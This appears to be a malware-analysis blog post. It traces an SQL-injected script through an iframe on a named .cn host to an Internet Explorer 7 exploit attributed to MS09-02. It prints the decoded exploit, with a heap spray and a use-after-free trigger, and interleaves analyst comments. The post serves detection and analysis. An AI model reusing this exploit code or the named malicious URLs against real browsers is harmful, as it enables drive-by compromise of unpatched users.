deabak.com/z.js

This is a new script that is being SQL-injected.

z.js contains an iframe from http://www.893500.cn/2/index.htm

The index.htm contains links to several of the typical variety of exploits. One of them, 02.htm, is an MS09-02 exploit.

The IE7 exploit is decoded as follows:

// Analyst notes on the decoded sample (setup stage, runs at page load).
// NOTE(review): the typographic quotes and the "×" in "0×100000" below are
// presumably artifacts of the blog's text formatting; as printed, the listing
// is not valid JavaScript and is kept verbatim as a specimen.
//
// b becomes the unescape() of "%u0C0C%u0C0C". The escape string is assembled
// from one-character pieces, so a literal search for "%u0C0C" in the page
// source will not match; signatures should be applied after de-obfuscation.
var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
// yumen is declared with var on the next line, so at this point it is hoisted
// and still undefined; test99 is not used anywhere else in the listing.
var test99=yumen;
var yumen=new Array();
// ttt is not defined in the visible listing. Every "Game" in it is replaced
// with "\x25\x75" (the characters "%u") before unescape() — presumably ttt
// holds the encoded payload with "Game" standing in for "%u"; confirm against
// the full 02.htm. Tameeeeee is assigned without var, making it a global.
Tameeeeee=unescape(ttt.replace(/Game/g,”\x25\x75″));
// b is doubled until its length reaches 0x100000 minus a term derived from
// ttt.length; lh is then the prefix of b cut to exactly that length.
while(b.length<0x100000-(ttt.length*2+0x01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0x01020)/2);
// 0xC0 (192) strings, each lh followed by Tameeeeee, are stored in yumen:
// many large identical allocations of filler plus decoded content, the
// pattern usually described as a heap spray. CollectGarbage() is the JScript
// function exposed by Internet Explorer; its presence is a useful triage hint.
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
// s1 is the unescape() of "%u0b0b%u0b0b" followed by a run of "kf"
// characters, again built from one-character pieces.
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
// a1 collects 1000 freshly created <img> elements; ok() later assigns s1 to
// the src of each one.
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
// Analyst notes on ok(), the trigger stage of the sample.
// Nothing in the visible listing calls ok(); the caller (for example an event
// handler in the surrounding HTML) is not shown on this page.
// The steps below create an element, clone it, clear and drop the original,
// force garbage collection, write s1 into the src of every <img> in a1, and
// finally touch a property of the clone. The page attributes this to the
// MS09-02 exploit; patch status of the browser is the relevant mitigation.
// o1 is assigned without var, so it is a global. a1 and s1 are the array and
// string built earlier in the listing.
function ok(){o1=document.createElement(“tbody”);
// Property reference only: there are no call parentheses, so click is read,
// not invoked.
o1.click;
// o2 keeps a clone of o1 while o1 itself is cleared and released.
var o2=o1.cloneNode();
o1.clearAttributes();
o1=null;
// CollectGarbage() is IE-specific; it runs right after the only reference
// held in o1 is dropped.
CollectGarbage();
// Assigns s1 to the src of all elements in a1, then reads o2.click (again
// without calling it) as the last statement of the function.
for(var x=0; x<a1.length; x++)a1[x].src=s1; o2.click}
